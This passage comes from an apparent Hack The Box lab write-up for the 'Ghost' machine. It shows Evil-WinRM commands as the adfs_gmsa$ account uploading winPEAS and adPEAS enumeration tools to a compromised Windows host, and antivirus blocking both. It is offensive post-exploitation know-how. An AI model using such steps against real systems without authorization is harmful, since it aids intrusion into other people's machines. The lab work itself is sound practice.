PEAS
Conducting an automated enumeration after performing the manual enumeration
It will be done under the security context of the adfs_gmsa$ account as the account has higher privileges compared to the justin.bradley user
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> upload winPEASx64.exe .
Info: Uploading /home/kali/archive/htb/labs/ghost/winPEASx64.exe to C:\Users\adfs_gmsa$\Documents\.
Data: 2624852 bytes of 2624852 bytes copied
Info: Upload successful!Delivery complete
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> .\winPEASx64.exe
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailedAV is flagging it
adPEAS
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> upload adPEAS.ps1 .
Info: Uploading /home/kali/archive/htb/labs/ghost/adPEAS.ps1 to C:\Users\adfs_gmsa$\Documents\.
Data: 4159704 bytes of 4159704 bytes copied
Info: Upload successful!uploaded
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> . .\adPEAS.ps1
At C:\Users\adfs_gmsa$\Documents\adPEAS.ps1:1 char:1
+ Function Invoke-adPEAS {
+ ~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At C:\Users\adfs_gmsa$\Documents\adPEAS.ps1:1 char:1
+ Function Invoke-adPEAS {
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContentAV is flagging it